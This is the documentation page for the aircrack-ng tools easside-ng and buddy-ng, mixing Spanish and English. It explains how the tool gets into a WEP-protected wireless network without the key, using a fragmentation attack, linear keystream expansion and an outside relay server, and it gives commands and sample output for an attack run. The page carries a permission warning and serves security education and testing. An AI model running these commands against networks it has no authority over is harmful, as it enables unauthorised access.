Table of Contents

Easside-ng

Traducción en proceso

++++++ IMPORTANTE ++++++
++++++ IMPORTANTE ++++++
++++++ IMPORTANTE ++++++

Esta funcionalidad estará disponible en una versión futura. NO está disponible actualmente.

++++++ IMPORTANTE ++++++
++++++ IMPORTANTE ++++++
++++++ IMPORTANTE ++++++

Descripción

Easside-ng es una utilidad auto-mágica que nos permite comunicarnos con un punto de acceso (AP) sin necesidad de conocer la clave WEP. Primero idetifica una red wireless, despues procede a asociarse con ella, obtiene el PRGA (del inglés “pseudo random generation algorithm”) xor data, determina el rango de IPs de la red y por último crea una interface TAP para poder comunicarse con el AP sin necesidad de cononer la clave WEP. Todo esto se realiza sin necesidad de la intervención del usuario.

Hay dos documentos muy interesantes en inglés: “The Fragmentation Attack in Practice” por Andrea Bittau y “The Final Nail in WEP's Coffin” por Andrea Bittau, Mark Handley y Josua Lockey. Mira links page para encontrar estos documentos y muchos otros. Ahí encontrarás información para comprender detalladamente la metodología usada con esta aplicación. Los conceptos del ataque de fragmentación actualmente incorporado en aircrack-ng vienen de todos estos documentos.

Para conseguir acceder a la red wireless sin conocer la clave WEP es necesario que el AP desencripte los paquetes por sí mismo. Esto se consigue utilizando o ejecutandoo un proceso denominado “buddy” en un servidor accesible desde la red Internet. Este servidor “buddy” o “ficticio o amigo” redirige los paquetes desencriptados a nuestro propio sistema ejecutando easside-ng. Esto necesita una serie de requerimientos para que easside-ng funcione:

Hay dos fases:

Cada fase se describe más detalladamente en la secciones siguientes.

Estableciendo Conectividad

A continuación puedes ver los pasos que lleva a cabo essside-ng durante la fase de establecimiento de conectividad:

  1. Cambia de canal buscando una red con clave WEP.
  2. Una vez que encuentra una red, intenta autenticarse.
  3. Cuando se ha autenticado satisfactoriamente intenta asociarse con el AP.
  4. Despues de esnifar un paquete de datos, procede a descubrir al menos 1504 bytes de PRGA enviando “broadcasts” más grandes e interceptando los paquetes de respuesta. Esto es conocido como ataque de fragmentación. El PRGA se guarda en el archivo prga.log.
  5. Seguidamente averigua la dirección IP de la red usando la técnica “linear keystream expansion”.
  6. Crea una conexión TCP permanente con el servidor “buddy” y verifica la conectividad.
  7. Envia ARPs para obtener la dirección MAC del router y la IP de origen. Por defecto se usa .1 para el router y .123 para el cliente IP.
  8. Entonces prueba la conexión con el punto de acceso y determina el rango de direcciones IP que usa el AP. También lista el tiempo que se tarda en obtener los paquetes de prueba. Esto nos dá una idea de la calidad de la conexión.
  9. Se crea una interface TAP.

En este punto, se ejecuta “ifconfig at0 up” y ahora serás capaz de comunicarte a través de la interface TAP con cualquier “host” de la red wifi. Recuerda que no necesitas una clave WEP para hacer esto! La interface TAP es una interface virtual que actua como si fuese la interface wifi con la clave WEP configurada correctamente. Puedes asignar una dirección IP, usar DHCP con ella, etc..

¿Qué papel juega el amigo servidor (buddy server)?

A continuación puedes leer una simple descripción. Una descripción más detallada con los pasos para desencriptar paquetes se incluye en secciones posteriores.

Communicación con la red WIFI

Lo que explicamos a continuación se describe en este diagrama de forma detallada:




Te estarás preguntando ¿donde está lo mágico?. ¿Cómo puedes acceder a la red wifi sin conocer la clave WEP?. El método es demasiado simple y también ingenioso.

Veamos los detalles del envio y recogida de paquetes a través de la interface at0 TAP.

Paquetes enviados:

Paquetes recibidos:

Técnica de Fragmentación

Esta sección proporciona una pequeña explicación de la técnica de fragmentación usada en easside-ng.

Esta técnica, cuando es exitosa, puede obtener 1504 bytes del PRGA (del inglés “pseudo random generation algorithm”). Este ataque no obtiene la clave WEP por si mismo, pero sirve para conseguir el PRGA. Y el PRGA se puede usar para encriptar los paquetes que deseemos transmitir. Es necesario conseguir al menos un paquete de datos recibido desde el punto de acceso para poder iniciar el ataque.

Básicamente, el programa obtiene a small amount of keying material from the packet then attempts to send packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1504 bytes of PRGA are obtained.

The original paper, The Fragmentation Attack in Practice, by Andrea Bittau provides a much more detailed technical description of the technique. A local copy is located here. Here are presentation slides of a related paper. A local copy of the slides is located here. Also see the paper “The Final Nail in WEP's Coffin” on this page.

Linear Keystream Expansion Technique

This section provides a brief explanation of the linear keystream expansion technique used in easside-ng.

So you may also be asking “What is the linear keystream expansion technique?”. The foundation is the fact that packets like an encrypted ARP request can easily be identified combined with the fact that the start of it has known plain text.

The program first obtains the PRGA from known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. The first fragment is one more byte then the know PRGA and the PRGA is guessed for the extra byte. These guesses are sent and the program listens to see which one is replayed by the AP. The replayed packet has the correct PRGA and this value was included in the destination multicast address. Now that we know the correct PRGA, one more byte can be decrypted in the original ARP request. This process is repeated until the sending IP in the original ARP request is decrypted. It takes a maximum of 256 guesses to determine the correct PRGA for a particular byte and on average only 128 guesses.

The linear keystream expansion technique (Arbaugh inductive) is reverse chopchop. Chopchop decrypts packets from back to the front. Linear decrypts packets from the front to the back. Actually, chopchop is reverse Arbaugh.

Easside-ng comparado con Wesside-ng

La comparación del programa easside-ng hay que realizarla con wesside-ng. A continuación puedes ver una tabla con la comparación de los dos programas:

Característicaseasside-ngwesside-ng
Estabilidad del programaEstableEn pruebas
Encuentra dirección MAC a falsificarNoSi
Falsa autenticacion al APSiSi
Puede usar paquetes ARP para fragmentacionSiSi
Puede usar paquetes IP para fragmentacionSiNo
Ataque de Fragmentacion para obtener PRGASiSi
Técnica de expansión “Linear Keystream”SiSi
Comunicación con la red wifi sin la clave WEPSiNo
Desbordar la red con peticiones ARPNoSi
Ataque PTW de Aircrack-ngNoSi
Recupera la clave WEPNoSi

Why easside-ng when aircrack-ng has PTW?

Why release easside-ng when aircrack-ng has PTW?

Uso

Uso: easside-ng <argumentos>

Donde:

Uso: buddy-ng

NOTA: No hay parámetros para buddy-ng. Una vez invocado, se pone a escuchar en el puerto TCP 6969 y en el puerto UDP 6969. TCP se usa para la conexión permanente entre esside-ng y buddy-ng. UDP se usa para recibir los paquetes desencriptados desde el AP.

Cuando se ejecuta easside-ng, crea un archivo automáticamente en el directorio actual donde se está ejecutando el programa:

Es muy importante borrar este archivo antes de comenzar de nuevo el programa cuando cambiamos la dirección del punto de acceso al que queremos atacar.

Escenarios

Specific AP Usage Example

Be sure to use airmon-ng to put your card into monitor mode.

First, you need to start a buddy server. This needs to be located on the Internet and be accessible from the system running easside-ng via TCP. It must also be accessible from the AP via UDP. Port 6969 cannot be firewalled on it.

You start the buddy sever:

 buddy-ng

It responds:

 buddy-ng
 Waiting for connexion

When easside-ng connects, it responds similar to:

 Got connection from 10.113.65.187
 Handshake complete
 Inet check by 10.113.65.187 1

The IP 10.113.65.187 above is the IP of the system running easside-ng.

Now run easside-ng:

 easside-ng -f ath0 -v 00:14:6C:7E:40:80 -c 9  -s 10.116.23.144

Where:

The system responds:

 Setting tap MTU
 Sorting out wifi MAC
 MAC is 00:08:D4:86:7E:98
 Setting tap MAC
 [14:40:06.596419] Ownin...
 SSID teddy Chan 9 Mac 00:14:6C:7E:40:80
 Sending auth request
 Authenticated
 Sending assoc request
 Associated: 1
 Assuming ARP 54
 [14:40:13.537842] Got 22 bytes of PRGA IV [4B:02:00]
 [14:40:13.545021] Got 58 bytes of PRGA IV [4C:02:00]
 [14:40:13.648670] Got 166 bytes of PRGA IV [4D:02:00]
 [14:40:13.753087] Got 490 bytes of PRGA IV [4E:02:00]
 [14:40:13.863819] Got 1462 bytes of PRGA IV [4F:02:00]
 [14:40:13.966753] Got 1504 bytes of PRGA IV [50:02:00]
 Assuming ARP 36
 [15:23:42.047332] Guessing prga byte 22 with 16
 ARP IP so far: 192
 [15:23:42.749330] Guessing prga byte 23 with 3F
 ARP IP so far: 192.168
 [15:23:43.815329] Guessing prga byte 24 with 60
 ARP IP so far: 192.168.1
 My IP 192.168.1.123
 Rtr IP 192.168.1.1
 Sending who has 192.168.1.1 tell 192.168.1.123
 Rtr MAC 00:14:6C:7E:40:80
 Trying to connect to buddy: 10.116.23.144:6969
 Connected
 Handshake compl33t
 Checking for internet... 1
 Internet w0rx.  Public IP 10.113.65.187
 Rtt 77ms

At this point, you need to bring up the TAP interface:

 ifconfig at0 up

Now you can send and receive packets to and from the AP network which in this case is 192.168.1.0/24 via the at0 inteface. Notice that you don't need a WEP key to do this! The TAP interface is a virtual interface that acts as if it were the wifi interface with the correct WEP key configured. You can assign an IP, use DHCP with it and so on. By default, the at0 interface is assigned the network obtained at the start plus “.123”.

Ejemplo de uso para el escaneo de APs

El “Ejemplo de uso específico AP” es para apuntar a un único Punto de Acceso en un canal concreto. Tambié puedes permitir a easside-ng escanear a todos los APs usando “easside-ng -f ath0 -s 10.116.23.144”.

Usage Tips

Combinando easside-ng y wesside-ng

Como sabes, wesside-ng es una nueva utilidad muy funcional, pero todavía no es demasiado estable y no está libre de bugs en comparación a easside-ng. Puedes combinar las dos aplicaciones a la vez: wesside-ng y easside-ng.

Primero ejecuta easside-ng para obtener el archivo prga. Despues ejecuta wesside-ng con el fin de obtener la clave WEP. Realmente es así de simple!

Esto se conoce como “besside-ng”.

Demonstrating Insecurity!

IMPORTANT: You must have written permission from the owner of the AP prior to using the instructions in this section. It is illegal to access networks which do not belong to you.

A clever way to demonstrate the insecurity of WEP networks and access points:

Test Setup

This section will discuss what works and what does not work with regards to testing easside-ng against your own wireless LAN.

6969 is the standard port used by easside-ng and buddy-ng. If you change it, then of course, use the revised port number in all references below.

First, some simple assumptions about your wireless LAN:

Assumptions about your buddy-ng server:

Assumptions about the system running easside-ng;

The easiest way to test connectivity to the buddy-ng server is by using telnet. Be sure to start your buddy server process prior to doing this test! Otherwise it will fail for sure.

Enter:

 telnet <ip of buddy server> 6969

The system should respond:

 Trying <ip of buddy server>...
 Connected to <ip of buddy server>.
 Escape character is '^]'.

The buddy server should look like this:

 Waiting for connexion
 Got connection from <ip of the easside-ng system>

When you terminate the telnet session, it should look like this:

 That was it
 Waiting for connexion

The above examples show a successful test. If your test fails then use tcpdump or wireshark on the source and destination systems to sniff port 6969. Determine the problem with these tools and others then correct the root problem.

If you are running easside-ng and buddy-ng on the same system then the system must have a routeable Internet IP address. You cannot be on a LAN behind a firewall which does network address translation (NAT).

The ideal situation is to have the buddy-ng server running on a separate system someplace on the Internet. Then have a second system with easside-ng running with a routeable IP address.

Tap interface under Windows

To obtain a tap interface in a MS Windows environment, install OpenVPN.

Usage Troubleshooting